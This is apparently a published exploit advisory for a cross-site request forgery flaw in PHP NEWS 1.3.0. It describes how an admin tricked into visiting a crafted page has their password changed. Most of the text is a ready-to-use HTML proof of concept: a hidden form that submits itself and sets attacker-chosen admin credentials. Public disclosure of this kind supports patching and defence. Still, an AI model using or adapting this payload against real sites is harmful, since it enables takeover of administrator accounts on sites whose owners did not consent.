*=========================================================================================================# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)# Author: Meryem AKDOĞAN# Google Dork: -# Date: 16/10/2016# Type: webapps# Platform : PHP# Vendor Homepage: http://newsphp.sourceforge.net# Software Link: https://sourceforge.net/projects/newsphp/# Version: 1.3.0*=========================================================================================================
DETAILS
========================================
PHP NEWS 1.3.0 versions is vulnerable to CSRF attack (No CSRF token in
place) meaning that if an admin user can be tricked to visit a crafted URL
created
by attacker (via spear phishing/social engineering), a form will be
submitted to (http://sitename/path/index.php) that will change admin
password.
Once exploited, the attacker can login to the admin panel using the
username and the password he posted in the form.
RISK
========================================
Attacker can change admin password with this vulnerablity
TECHNICAL DETAILS & POC
========================================<html><!— CSRF PoC —><body><form action="
http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST"><inputtype="hidden" name="id" value="7"/><inputtype="hidden" name="newusername" value="meryem akdogan"/><inputtype="hidden" name="username" value="meryem"/><inputtype="hidden" name="password" value="meryem123."/><inputtype="hidden" name="password2" value="meryem123."/><inputtype="hidden" name="email" value="b@gmail.com"/><inputtype="hidden" name="language" value="en_GB"/><inputtype="submit" value="Submit request"/></form><script>
document.forms[0].submit();</script></body></html>========================================